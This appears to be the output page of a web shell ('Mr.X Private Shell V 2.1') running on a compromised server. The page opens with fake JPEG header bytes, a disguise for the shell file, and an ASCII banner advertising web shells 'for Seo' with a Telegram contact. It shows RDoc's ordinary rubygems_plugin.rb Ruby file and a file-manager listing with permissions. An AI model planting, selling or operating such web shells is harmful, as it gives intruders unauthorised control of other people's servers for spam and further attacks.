����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# frozen_string_literal: true # If this file is exist, RDoc generates and removes documents by rubygems plugins. # # In follwing cases, # RubyGems directly exectute RDoc::RubygemsHook.generation_hook and RDoc::RubygemsHook#remove to generate and remove documents. # # - RDoc is used as a default gem. # - RDoc is a old version that doesn't have rubygems_plugin.rb. require_relative 'rdoc/rubygems_hook' # To install dependency libraries of RDoc, you need to run bundle install. # At that time, rdoc/markdown is not generated. # If generate and remove are executed at that time, an error will occur. # So, we can't register generate and remove to Gem at that time. begin require_relative 'rdoc/markdown' rescue LoadError else Gem.done_installing(&RDoc::RubyGemsHook.method(:generate)) Gem.pre_uninstall(&RDoc::RubyGemsHook.method(:remove)) end
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| rdoc | Folder | 0755 |
|
|
| rdoc.rb | File | 6.41 KB | 0644 |
|
| rubygems_plugin.rb | File | 852 B | 0644 |
|